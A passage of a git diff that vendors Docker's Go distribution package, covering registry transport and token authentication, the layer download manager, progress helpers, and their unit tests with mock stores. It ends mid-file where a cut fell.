distribution.BlobStore = &mockBlobStore{} + +func (m *mockBlobStore) Stat(ctx context.Context, dgst digest.Digest) (distribution.Descriptor, error) { + m.repo.requests = append(m.repo.requests, dgst.String()) + if err, exists := m.repo.errors[dgst]; exists { + return distribution.Descriptor{}, err + } + if desc, exists := m.repo.blobs[dgst]; exists { + return desc, nil + } + return distribution.Descriptor{}, distribution.ErrBlobUnknown +} +func (m *mockBlobStore) Get(ctx context.Context, dgst digest.Digest) ([]byte, error) { + m.repo.t.Fatal("Get() not implemented") + return nil, nil +} + +func (m *mockBlobStore) Open(ctx context.Context, dgst digest.Digest) (distribution.ReadSeekCloser, error) { + m.repo.t.Fatal("Open() not implemented") + return nil, nil +} + +func (m *mockBlobStore) Put(ctx context.Context, mediaType string, p []byte) (distribution.Descriptor, error) { + m.repo.t.Fatal("Put() not implemented") + return distribution.Descriptor{}, nil +} + +func (m *mockBlobStore) Create(ctx context.Context, options ...distribution.BlobCreateOption) (distribution.BlobWriter, error) { + m.repo.t.Fatal("Create() not implemented") + return nil, nil +} +func (m *mockBlobStore) Resume(ctx context.Context, id string) (distribution.BlobWriter, error) { + m.repo.t.Fatal("Resume() not implemented") + return nil, nil +} +func (m *mockBlobStore) Delete(ctx context.Context, dgst digest.Digest) error { + m.repo.t.Fatal("Delete() not implemented") + return nil +} +func (m *mockBlobStore) ServeBlob(ctx context.Context, w http.ResponseWriter, r *http.Request, dgst digest.Digest) error { + m.repo.t.Fatalf("ServeBlob() not implemented") + return nil +} + +type mockV2MetadataService struct { + added []metadata.V2Metadata + removed []metadata.V2Metadata +} + +var _ metadata.V2MetadataService = &mockV2MetadataService{} + +func (*mockV2MetadataService) GetMetadata(diffID layer.DiffID) ([]metadata.V2Metadata, error) { + return nil, nil +} +func (*mockV2MetadataService) GetDiffID(dgst digest.Digest) (layer.DiffID, error) { + return "", nil +} +func (m *mockV2MetadataService) Add(diffID layer.DiffID, metadata metadata.V2Metadata) error { + m.added = append(m.added, metadata) + return nil +} +func (m *mockV2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, meta metadata.V2Metadata) error { + meta.HMAC = metadata.ComputeV2MetadataHMAC(hmacKey, &meta) + m.Add(diffID, meta) + return nil +} +func (m *mockV2MetadataService) Remove(metadata metadata.V2Metadata) error { + m.removed = append(m.removed, metadata) + return nil +} + +type progressSink struct { + t *testing.T +} + +func (s *progressSink) WriteProgress(p progress.Progress) error { + s.t.Logf("progress update: %#+v", p) + return nil +} diff --git a/vendor/github.com/docker/docker/distribution/registry.go b/vendor/github.com/docker/docker/distribution/registry.go new file mode 100644 index 0000000000..95e181ded8 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/registry.go @@ -0,0 +1,156 @@ +package distribution + +import ( + "fmt" + "net" + "net/http" + "time" + + "github.com/docker/distribution" + "github.com/docker/distribution/manifest/schema2" + distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/client" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/registry" + "github.com/docker/go-connections/sockets" + "golang.org/x/net/context" +) + +// ImageTypes represents the schema2 config types for images +var ImageTypes = []string{ + schema2.MediaTypeImageConfig, + // Handle unexpected values from https://github.com/docker/distribution/issues/1621 + // (see also https://github.com/docker/docker/issues/22378, + // https://github.com/docker/docker/issues/30083) + "application/octet-stream", + "application/json", + "text/html", + // Treat defaulted values as images, newer types cannot be implied + "", +} + +// PluginTypes represents the schema2 config types for plugins +var PluginTypes = []string{ + schema2.MediaTypePluginConfig, +} + +var mediaTypeClasses map[string]string + +func init() { + // initialize media type classes with all know types for + // plugin + mediaTypeClasses = map[string]string{} + for _, t := range ImageTypes { + mediaTypeClasses[t] = "image" + } + for _, t := range PluginTypes { + mediaTypeClasses[t] = "plugin" + } +} + +// NewV2Repository returns a repository (v2 only). It creates an HTTP transport +// providing timeout settings and authentication support, and also verifies the +// remote API version. +func NewV2Repository(ctx context.Context, repoInfo *registry.RepositoryInfo, endpoint registry.APIEndpoint, metaHeaders http.Header, authConfig *types.AuthConfig, actions ...string) (repo distribution.Repository, foundVersion bool, err error) { + repoName := repoInfo.FullName() + // If endpoint does not support CanonicalName, use the RemoteName instead + if endpoint.TrimHostname { + repoName = repoInfo.RemoteName() + } + + direct := &net.Dialer{ + Timeout: 30 * time.Second, + KeepAlive: 30 * time.Second, + DualStack: true, + } + + // TODO(dmcgowan): Call close idle connections when complete, use keep alive + base := &http.Transport{ + Proxy: http.ProxyFromEnvironment, + Dial: direct.Dial, + TLSHandshakeTimeout: 10 * time.Second, + TLSClientConfig: endpoint.TLSConfig, + // TODO(dmcgowan): Call close idle connections when complete and use keep alive + DisableKeepAlives: true, + } + + proxyDialer, err := sockets.DialerFromEnvironment(direct) + if err == nil { + base.Dial = proxyDialer.Dial + } + + modifiers := registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), metaHeaders) + authTransport := transport.NewTransport(base, modifiers...) + + challengeManager, foundVersion, err := registry.PingV2Registry(endpoint.URL, authTransport) + if err != nil { + transportOK := false + if responseErr, ok := err.(registry.PingResponseError); ok { + transportOK = true + err = responseErr.Err + } + return nil, foundVersion, fallbackError{ + err: err, + confirmedV2: foundVersion, + transportOK: transportOK, + } + } + + if authConfig.RegistryToken != "" { + passThruTokenHandler := &existingTokenHandler{token: authConfig.RegistryToken} + modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, passThruTokenHandler)) + } else { + scope := auth.RepositoryScope{ + Repository: repoName, + Actions: actions, + Class: repoInfo.Class, + } + + creds := registry.NewStaticCredentialStore(authConfig) + tokenHandlerOptions := auth.TokenHandlerOptions{ + Transport: authTransport, + Credentials: creds, + Scopes: []auth.Scope{scope}, + ClientID: registry.AuthClientID, + } + tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions) + basicHandler := auth.NewBasicHandler(creds) + modifiers = append(modifiers, auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler)) + } + tr := transport.NewTransport(base, modifiers...) + + repoNameRef, err := distreference.ParseNamed(repoName) + if err != nil { + return nil, foundVersion, fallbackError{ + err: err, + confirmedV2: foundVersion, + transportOK: true, + } + } + + repo, err = client.NewRepository(ctx, repoNameRef, endpoint.URL.String(), tr) + if err != nil { + err = fallbackError{ + err: err, + confirmedV2: foundVersion, + transportOK: true, + } + } + return +} + +type existingTokenHandler struct { + token string +} + +func (th *existingTokenHandler) Scheme() string { + return "bearer" +} + +func (th *existingTokenHandler) AuthorizeRequest(req *http.Request, params map[string]string) error { + req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", th.token)) + return nil +} diff --git a/vendor/github.com/docker/docker/distribution/registry_unit_test.go b/vendor/github.com/docker/docker/distribution/registry_unit_test.go new file mode 100644 index 0000000000..406de34915 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/registry_unit_test.go @@ -0,0 +1,136 @@ +package distribution + +import ( + "net/http" + "net/http/httptest" + "net/url" + "os" + "strings" + "testing" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/docker/utils" + "golang.org/x/net/context" +) + +const secretRegistryToken = "mysecrettoken" + +type tokenPassThruHandler struct { + reached bool + gotToken bool + shouldSend401 func(url string) bool +} + +func (h *tokenPassThruHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) { + h.reached = true + if strings.Contains(r.Header.Get("Authorization"), secretRegistryToken) { + logrus.Debug("Detected registry token in auth header") + h.gotToken = true + } + if h.shouldSend401 == nil || h.shouldSend401(r.RequestURI) { + w.Header().Set("WWW-Authenticate", `Bearer realm="foorealm"`) + w.WriteHeader(401) + } +} + +func testTokenPassThru(t *testing.T, ts *httptest.Server) { + tmp, err := utils.TestDirectory("") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + uri, err := url.Parse(ts.URL) + if err != nil { + t.Fatalf("could not parse url from test server: %v", err) + } + + endpoint := registry.APIEndpoint{ + Mirror: false, + URL: uri, + Version: 2, + Official: false, + TrimHostname: false, + TLSConfig: nil, + //VersionHeader: "verheader", + } + n, _ := reference.ParseNamed("testremotename") + repoInfo := ®istry.RepositoryInfo{ + Named: n, + Index: ®istrytypes.IndexInfo{ + Name: "testrepo", + Mirrors: nil, + Secure: false, + Official: false, + }, + Official: false, + } + imagePullConfig := &ImagePullConfig{ + Config: Config{ + MetaHeaders: http.Header{}, + AuthConfig: &types.AuthConfig{ + RegistryToken: secretRegistryToken, + }, + }, + Schema2Types: ImageTypes, + } + puller, err := newPuller(endpoint, repoInfo, imagePullConfig) + if err != nil { + t.Fatal(err) + } + p := puller.(*v2Puller) + ctx := context.Background() + p.repo, _, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull") + if err != nil { + t.Fatal(err) + } + + logrus.Debug("About to pull") + // We expect it to fail, since we haven't mock'd the full registry exchange in our handler above + tag, _ := reference.WithTag(n, "tag_goes_here") + _ = p.pullV2Repository(ctx, tag) +} + +func TestTokenPassThru(t *testing.T) { + handler := &tokenPassThruHandler{shouldSend401: func(url string) bool { return url == "/v2/" }} + ts := httptest.NewServer(handler) + defer ts.Close() + + testTokenPassThru(t, ts) + + if !handler.reached { + t.Fatal("Handler not reached") + } + if !handler.gotToken { + t.Fatal("Failed to receive registry token") + } +} + +func TestTokenPassThruDifferentHost(t *testing.T) { + handler := new(tokenPassThruHandler) + ts := httptest.NewServer(handler) + defer ts.Close() + + tsredirect := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + if r.RequestURI == "/v2/" { + w.Header().Set("WWW-Authenticate", `Bearer realm="foorealm"`) + w.WriteHeader(401) + return + } + http.Redirect(w, r, ts.URL+r.URL.Path, http.StatusMovedPermanently) + })) + defer tsredirect.Close() + + testTokenPassThru(t, tsredirect) + + if !handler.reached { + t.Fatal("Handler not reached") + } + if handler.gotToken { + t.Fatal("Redirect should not forward Authorization header to another host") + } +} diff --git a/vendor/github.com/docker/docker/distribution/utils/progress.go b/vendor/github.com/docker/docker/distribution/utils/progress.go new file mode 100644 index 0000000000..ef8ecc89f6 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/utils/progress.go @@ -0,0 +1,44 @@ +package utils + +import ( + "io" + "net" + "os" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" +) + +// WriteDistributionProgress is a helper for writing progress from chan to JSON +// stream with an optional cancel function. +func WriteDistributionProgress(cancelFunc func(), outStream io.Writer, progressChan <-chan progress.Progress) { + progressOutput := streamformatter.NewJSONStreamFormatter().NewProgressOutput(outStream, false) + operationCancelled := false + + for prog := range progressChan { + if err := progressOutput.WriteProgress(prog); err != nil && !operationCancelled { + // don't log broken pipe errors as this is the normal case when a client aborts + if isBrokenPipe(err) { + logrus.Info("Pull session cancelled") + } else { + logrus.Errorf("error writing progress to client: %v", err) + } + cancelFunc() + operationCancelled = true + // Don't return, because we need to continue draining + // progressChan until it's closed to avoid a deadlock. + } + } +} + +func isBrokenPipe(e error) bool { + if netErr, ok := e.(*net.OpError); ok { + e = netErr.Err + if sysErr, ok := netErr.Err.(*os.SyscallError); ok { + e = sysErr.Err + } + } + return e == syscall.EPIPE +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/download.go b/vendor/github.com/docker/docker/distribution/xfer/download.go new file mode 100644 index 0000000000..7545342212 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/download.go @@ -0,0 +1,452 @@ +package xfer + +import ( + "errors" + "fmt" + "io" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +const maxDownloadAttempts = 5 + +// LayerDownloadManager figures out which layers need to be downloaded, then +// registers and downloads those, taking into account dependencies between +// layers. +type LayerDownloadManager struct { + layerStore layer.Store + tm TransferManager +} + +// SetConcurrency set the max concurrent downloads for each pull +func (ldm *LayerDownloadManager) SetConcurrency(concurrency int) { + ldm.tm.SetConcurrency(concurrency) +} + +// NewLayerDownloadManager returns a new LayerDownloadManager. +func NewLayerDownloadManager(layerStore layer.Store, concurrencyLimit int) *LayerDownloadManager { + return &LayerDownloadManager{ + layerStore: layerStore, + tm: NewTransferManager(concurrencyLimit), + } +} + +type downloadTransfer struct { + Transfer + + layerStore layer.Store + layer layer.Layer + err error +} + +// result returns the layer resulting from the download, if the download +// and registration were successful. +func (d *downloadTransfer) result() (layer.Layer, error) { + return d.layer, d.err +} + +// A DownloadDescriptor references a layer that may need to be downloaded. +type DownloadDescriptor interface { + // Key returns the key used to deduplicate downloads. + Key() string + // ID returns the ID for display purposes. + ID() string + // DiffID should return the DiffID for this layer, or an error + // if it is unknown (for example, if it has not been downloaded + // before). + DiffID() (layer.DiffID, error) + // Download is called to perform the download. + Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) + // Close is called when the download manager is finished with this + // descriptor and will not call Download again or read from the reader + // that Download returned. + Close() +} + +// DownloadDescriptorWithRegistered is a DownloadDescriptor that has an +// additional Registered method which gets called after a downloaded layer is +// registered. This allows the user of the download manager to know the DiffID +// of each registered layer. This method is called if a cast to +// DownloadDescriptorWithRegistered is successful. +type DownloadDescriptorWithRegistered interface { + DownloadDescriptor + Registered(diffID layer.DiffID) +} + +// Download is a blocking function which ensures the requested layers are +// present in the layer store. It uses the string returned by the Key method to +// deduplicate downloads. If a given layer is not already known to present in +// the layer store, and the key is not used by an in-progress download, the +// Download method is called to get the layer tar data. Layers are then +// registered in the appropriate order. The caller must call the returned +// release function once it is is done with the returned RootFS object. +func (ldm *LayerDownloadManager) Download(ctx context.Context, initialRootFS image.RootFS, layers []DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) { + var ( + topLayer layer.Layer + topDownload *downloadTransfer + watcher *Watcher + missingLayer bool + transferKey = "" + downloadsByKey = make(map[string]*downloadTransfer) + ) + + rootFS := initialRootFS + for _, descriptor := range layers { + key := descriptor.Key() + transferKey += key + + if !missingLayer { + missingLayer = true + diffID, err := descriptor.DiffID() + if err == nil { + getRootFS := rootFS + getRootFS.Append(diffID) + l, err := ldm.layerStore.Get(getRootFS.ChainID()) + if err == nil { + // Layer already exists. + logrus.Debugf("Layer already exists: %s", descriptor.ID()) + progress.Update(progressOutput, descriptor.ID(), "Already exists") + if topLayer != nil { + layer.ReleaseAndLog(ldm.layerStore, topLayer) + } + topLayer = l + missingLayer = false + rootFS.Append(diffID) + continue + } + } + } + + // Does this layer have the same data as a previous layer in + // the stack? If so, avoid downloading it more than once. + var topDownloadUncasted Transfer + if existingDownload, ok := downloadsByKey[key]; ok { + xferFunc := ldm.makeDownloadFuncFromDownload(descriptor, existingDownload, topDownload) + defer topDownload.Transfer.Release(watcher) + topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput) + topDownload = topDownloadUncasted.(*downloadTransfer) + continue + } + + // Layer is not known to exist - download and register it. + progress.Update(progressOutput, descriptor.ID(), "Pulling fs layer") + + var xferFunc DoFunc + if topDownload != nil { + xferFunc = ldm.makeDownloadFunc(descriptor, "", topDownload) + defer topDownload.Transfer.Release(watcher) + } else { + xferFunc = ldm.makeDownloadFunc(descriptor, rootFS.ChainID(), nil) + } + topDownloadUncasted, watcher = ldm.tm.Transfer(transferKey, xferFunc, progressOutput) + topDownload = topDownloadUncasted.(*downloadTransfer) + downloadsByKey[key] = topDownload + } + + if topDownload == nil { + return rootFS, func() { + if topLayer != nil { + layer.ReleaseAndLog(ldm.layerStore, topLayer) + } + }, nil + } + + // Won't be using the list built up so far - will generate it + // from downloaded layers instead. + rootFS.DiffIDs = []layer.DiffID{} + + defer func() { + if topLayer != nil { + layer.ReleaseAndLog(ldm.layerStore, topLayer) + } + }() + + select { + case <-ctx.Done(): + topDownload.Transfer.Release(watcher) + return rootFS, func() {}, ctx.Err() + case <-topDownload.Done(): + break + } + + l, err := topDownload.result() + if err != nil { + topDownload.Transfer.Release(watcher) + return rootFS, func() {}, err + } + + // Must do this exactly len(layers) times, so we don't include the + // base layer on Windows. + for range layers { + if l == nil { + topDownload.Transfer.Release(watcher) + return rootFS, func() {}, errors.New("internal error: too few parent layers") + } + rootFS.DiffIDs = append([]layer.DiffID{l.DiffID()}, rootFS.DiffIDs...) + l = l.Parent() + } + return rootFS, func() { topDownload.Transfer.Release(watcher) }, err +} + +// makeDownloadFunc returns a function that performs the layer download and +// registration. If parentDownload is non-nil, it waits for that download to +// complete before the registration step, and registers the downloaded data +// on top of parentDownload's resulting layer. Otherwise, it registers the +// layer on top of the ChainID given by parentLayer. +func (ldm *LayerDownloadManager) makeDownloadFunc(descriptor DownloadDescriptor, parentLayer layer.ChainID, parentDownload *downloadTransfer) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + d := &downloadTransfer{ + Transfer: NewTransfer(), + layerStore: ldm.layerStore, + } + + go func() { + defer func() { + close(progressChan) + }() + + progressOutput := progress.ChanOutput(progressChan) + + select { + case <-start: + default: + progress.Update(progressOutput, descriptor.ID(), "Waiting") + <-start + } + + if parentDownload != nil { + // Did the parent download already fail or get + // cancelled? + select { + case <-parentDownload.Done(): + _, err := parentDownload.result() + if err != nil { + d.err = err + return + } + default: + } + } + + var ( + downloadReader io.ReadCloser + size int64 + err error + retries int + ) + + defer descriptor.Close() + + for { + downloadReader, size, err = descriptor.Download(d.Transfer.Context(), progressOutput) + if err == nil { + break + } + + // If an error was returned because the context + // was cancelled, we shouldn't retry. + select { + case <-d.Transfer.Context().Done(): + d.err = err + return + default: + } + + retries++ + if _, isDNR := err.(DoNotRetry); isDNR || retries == maxDownloadAttempts { + logrus.Errorf("Download failed: %v", err) + d.err = err + return + } + + logrus.Errorf("Download failed, retrying: %v", err) + delay := retries * 5 + ticker := time.NewTicker(time.Second) + + selectLoop: + for { + progress.Updatef(progressOutput, descriptor.ID(), "Retrying in %d second%s", delay, (map[bool]string{true: "s"})[delay != 1]) + select { + case <-ticker.C: + delay-- + if delay == 0 { + ticker.Stop() + break selectLoop + } + case <-d.Transfer.Context().Done(): + ticker.Stop() + d.err = errors.New("download cancelled during retry delay") + return + } + + } + } + + close(inactive) + + if parentDownload != nil { + select { + case <-d.Transfer.Context().Done(): + d.err = errors.New("layer registration cancelled") + downloadReader.Close() + return + case <-parentDownload.Done(): + } + + l, err := parentDownload.result() + if err != nil { + d.err = err + downloadReader.Close() + return + } + parentLayer = l.ChainID() + } + + reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(d.Transfer.Context(), downloadReader), progressOutput, size, descriptor.ID(), "Extracting") + defer reader.Close() + + inflatedLayerData, err := archive.DecompressStream(reader) + if err != nil { + d.err = fmt.Errorf("could not get decompression stream: %v", err) + return + } + + var src distribution.Descriptor + if fs, ok := descriptor.(distribution.Describable); ok { + src = fs.Descriptor() + } + if ds, ok := d.layerStore.(layer.DescribableStore); ok { + d.layer, err = ds.RegisterWithDescriptor(inflatedLayerData, parentLayer, src) + } else { + d.layer, err = d.layerStore.Register(inflatedLayerData, parentLayer) + } + if err != nil { + select { + case <-d.Transfer.Context().Done(): + d.err = errors.New("layer registration cancelled") + default: + d.err = fmt.Errorf("failed to register layer: %v", err) + } + return + } + + progress.Update(progressOutput, descriptor.ID(), "Pull complete") + withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered) + if hasRegistered { + withRegistered.Registered(d.layer.DiffID()) + } + + // Doesn't actually need to be its own goroutine, but + // done like this so we can defer close(c). + go func() { + <-d.Transfer.Released() + if d.layer != nil { + layer.ReleaseAndLog(d.layerStore, d.layer) + } + }() + }() + + return d + } +} + +// makeDownloadFuncFromDownload returns a function that performs the layer +// registration when the layer data is coming from an existing download. It +// waits for sourceDownload and parentDownload to complete, and then +// reregisters the data from sourceDownload's top layer on top of +// parentDownload. This function does not log progress output because it would +// interfere with the progress reporting for sourceDownload, which has the same +// Key. +func (ldm *LayerDownloadManager) makeDownloadFuncFromDownload(descriptor DownloadDescriptor, sourceDownload *downloadTransfer, parentDownload *downloadTransfer) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + d := &downloadTransfer{ + Transfer: NewTransfer(), + layerStore: ldm.layerStore, + } + + go func() { + defer func() { + close(progressChan) + }() + + <-start + + close(inactive) + + select { + case <-d.Transfer.Context().Done(): + d.err = errors.New("layer registration cancelled") + return + case <-parentDownload.Done(): + } + + l, err := parentDownload.result() + if err != nil { + d.err = err + return + } + parentLayer := l.ChainID() + + // sourceDownload should have already finished if + // parentDownload finished, but wait for it explicitly + // to be sure. + select { + case <-d.Transfer.Context().Done(): + d.err = errors.New("layer registration cancelled") + return + case <-sourceDownload.Done(): + } + + l, err = sourceDownload.result() + if err != nil { + d.err = err + return + } + + layerReader, err := l.TarStream() + if err != nil { + d.err = err + return + } + defer layerReader.Close() + + var src distribution.Descriptor + if fs, ok := l.(distribution.Describable); ok { + src = fs.Descriptor() + } + if ds, ok := d.layerStore.(layer.DescribableStore); ok { + d.layer, err = ds.RegisterWithDescriptor(layerReader, parentLayer, src) + } else { + d.layer, err = d.layerStore.Register(layerReader, parentLayer) + } + if err != nil { + d.err = fmt.Errorf("failed to register layer: %v", err) + return + } + + withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered) + if hasRegistered { + withRegistered.Registered(d.layer.DiffID()) + } + + // Doesn't actually need to be its own goroutine, but + // done like this so we can defer close(c). + go func() { + <-d.Transfer.Released() + if d.layer != nil { + layer.ReleaseAndLog(d.layerStore, d.layer) + } + }() + }() + + return d + } +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/download_test.go b/vendor/github.com/docker/docker/distribution/xfer/download_test.go new file mode 100644 index 0000000000..bc20e1e7ec --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/download_test.go @@ -0,0 +1,356 @@ +package xfer + +import ( + "bytes" + "errors" + "fmt" + "io" + "io/ioutil" + "runtime" + "sync/atomic" + "testing" + "time" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +const maxDownloadConcurrency = 3 + +type mockLayer struct { + layerData bytes.Buffer + diffID layer.DiffID + chainID layer.ChainID + parent layer.Layer +} + +func (ml *mockLayer) TarStream() (io.ReadCloser, error) { + return ioutil.NopCloser(bytes.NewBuffer(ml.layerData.Bytes())), nil +} + +func (ml *mockLayer) TarStreamFrom(layer.ChainID) (io.ReadCloser, error) { + return nil, fmt.Errorf("not implemented") +} + +func (ml *mockLayer) ChainID() layer.ChainID { + return ml.chainID +} + +func (ml *mockLayer) DiffID() layer.DiffID { + return ml.diffID +} + +func (ml *mockLayer) Parent() layer.Layer { + return ml.parent +} + +func (ml *mockLayer) Size() (size int64, err error) { + return 0, nil +} + +func (ml *mockLayer) DiffSize() (size int64, err error) { + return 0, nil +} + +func (ml *mockLayer) Metadata() (map[string]string, error) { + return make(map[string]string), nil +} + +type mockLayerStore struct { + layers map[layer.ChainID]*mockLayer +} + +func createChainIDFromParent(parent layer.ChainID, dgsts ...layer.DiffID) layer.ChainID { + if len(dgsts) == 0 { + return parent + } + if parent == "" { + return createChainIDFromParent(layer.ChainID(dgsts[0]), dgsts[1:]...) + } + // H = "H(n-1) SHA256(n)" + dgst := digest.FromBytes([]byte(string(parent) + " " + string(dgsts[0]))) + return createChainIDFromParent(layer.ChainID(dgst), dgsts[1:]...) +} + +func (ls *mockLayerStore) Map() map[layer.ChainID]layer.Layer { + layers := map[layer.ChainID]layer.Layer{} + + for k, v := range ls.layers { + layers[k] = v + } + + return layers +} + +func (ls *mockLayerStore) Register(reader io.Reader, parentID layer.ChainID) (layer.Layer, error) { + return ls.RegisterWithDescriptor(reader, parentID, distribution.Descriptor{}) +} + +func (ls *mockLayerStore) RegisterWithDescriptor(reader io.Reader, parentID layer.ChainID, _ distribution.Descriptor) (layer.Layer, error) { + var ( + parent layer.Layer + err error + ) + + if parentID != "" { + parent, err = ls.Get(parentID) + if err != nil { + return nil, err + } + } + + l := &mockLayer{parent: parent} + _, err = l.layerData.ReadFrom(reader) + if err != nil { + return nil, err + } + l.diffID = layer.DiffID(digest.FromBytes(l.layerData.Bytes())) + l.chainID = createChainIDFromParent(parentID, l.diffID) + + ls.layers[l.chainID] = l + return l, nil +} + +func (ls *mockLayerStore) Get(chainID layer.ChainID) (layer.Layer, error) { + l, ok := ls.layers[chainID] + if !ok { + return nil, layer.ErrLayerDoesNotExist + } + return l, nil +} + +func (ls *mockLayerStore) Release(l layer.Layer) ([]layer.Metadata, error) { + return []layer.Metadata{}, nil +} +func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, string, layer.MountInit, map[string]string) (layer.RWLayer, error) { + return nil, errors.New("not implemented") +} + +func (ls *mockLayerStore) GetRWLayer(string) (layer.RWLayer, error) { + return nil, errors.New("not implemented") +} + +func (ls *mockLayerStore) ReleaseRWLayer(layer.RWLayer) ([]layer.Metadata, error) { + return nil, errors.New("not implemented") +} +func (ls *mockLayerStore) GetMountID(string) (string, error) { + return "", errors.New("not implemented") +} + +func (ls *mockLayerStore) Cleanup() error { + return nil +} + +func (ls *mockLayerStore) DriverStatus() [][2]string { + return [][2]string{} +} + +func (ls *mockLayerStore) DriverName() string { + return "mock" +} + +type mockDownloadDescriptor struct { + currentDownloads *int32 + id string + diffID layer.DiffID + registeredDiffID layer.DiffID + expectedDiffID layer.DiffID + simulateRetries int +} + +// Key returns the key used to deduplicate downloads. +func (d *mockDownloadDescriptor) Key() string { + return d.id +} + +// ID returns the ID for display purposes. +func (d *mockDownloadDescriptor) ID() string { + return d.id +} + +// DiffID should return the DiffID for this layer, or an error +// if it is unknown (for example, if it has not been downloaded +// before). +func (d *mockDownloadDescriptor) DiffID() (layer.DiffID, error) { + if d.diffID != "" { + return d.diffID, nil + } + return "", errors.New("no diffID available") +} + +func (d *mockDownloadDescriptor) Registered(diffID layer.DiffID) { + d.registeredDiffID = diffID +} + +func (d *mockDownloadDescriptor) mockTarStream() io.ReadCloser { + // The mock implementation returns the ID repeated 5 times as a tar + // stream instead of actual tar data. The data is ignored except for + // computing IDs. + return ioutil.NopCloser(bytes.NewBuffer([]byte(d.id + d.id + d.id + d.id + d.id))) +} + +// Download is called to perform the download. +func (d *mockDownloadDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) { + if d.currentDownloads != nil { + defer atomic.AddInt32(d.currentDownloads, -1) + + if atomic.AddInt32(d.currentDownloads, 1) > maxDownloadConcurrency { + return nil, 0, errors.New("concurrency limit exceeded") + } + } + + // Sleep a bit to simulate a time-consuming download. + for i := int64(0); i <= 10; i++ { + select { + case <-ctx.Done(): + return nil, 0, ctx.Err() + case <-time.After(10 * time.Millisecond): + progressOutput.WriteProgress(progress.Progress{ID: d.ID(), Action: "Downloading", Current: i, Total: 10}) + } + } + + if d.simulateRetries != 0 { + d.simulateRetries-- + return nil, 0, errors.New("simulating retry") + } + + return d.mockTarStream(), 0, nil +} + +func (d *mockDownloadDescriptor) Close() { +} + +func downloadDescriptors(currentDownloads *int32) []DownloadDescriptor { + return []DownloadDescriptor{ + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id1", + expectedDiffID: layer.DiffID("sha256:68e2c75dc5c78ea9240689c60d7599766c213ae210434c53af18470ae8c53ec1"), + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id2", + expectedDiffID: layer.DiffID("sha256:64a636223116aa837973a5d9c2bdd17d9b204e4f95ac423e20e65dfbb3655473"), + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id3", + expectedDiffID: layer.DiffID("sha256:58745a8bbd669c25213e9de578c4da5c8ee1c836b3581432c2b50e38a6753300"), + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id2", + expectedDiffID: layer.DiffID("sha256:64a636223116aa837973a5d9c2bdd17d9b204e4f95ac423e20e65dfbb3655473"), + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id4", + expectedDiffID: layer.DiffID("sha256:0dfb5b9577716cc173e95af7c10289322c29a6453a1718addc00c0c5b1330936"), + simulateRetries: 1, + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id5", + expectedDiffID: layer.DiffID("sha256:0a5f25fa1acbc647f6112a6276735d0fa01e4ee2aa7ec33015e337350e1ea23d"), + }, + } +} + +func TestSuccessfulDownload(t *testing.T) { + // TODO Windows: Fix this unit text + if runtime.GOOS == "windows" { + t.Skip("Needs fixing on Windows") + } + layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)} + ldm := NewLayerDownloadManager(layerStore, maxDownloadConcurrency) + + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]progress.Progress) + + go func() { + for p := range progressChan { + receivedProgress[p.ID] = p + } + close(progressDone) + }() + + var currentDownloads int32 + descriptors := downloadDescriptors(¤tDownloads) + + firstDescriptor := descriptors[0].(*mockDownloadDescriptor) + + // Pre-register the first layer to simulate an already-existing layer + l, err := layerStore.Register(firstDescriptor.mockTarStream(), "") + if err != nil { + t.Fatal(err) + } + firstDescriptor.diffID = l.DiffID() + + rootFS, releaseFunc, err := ldm.Download(context.Background(), 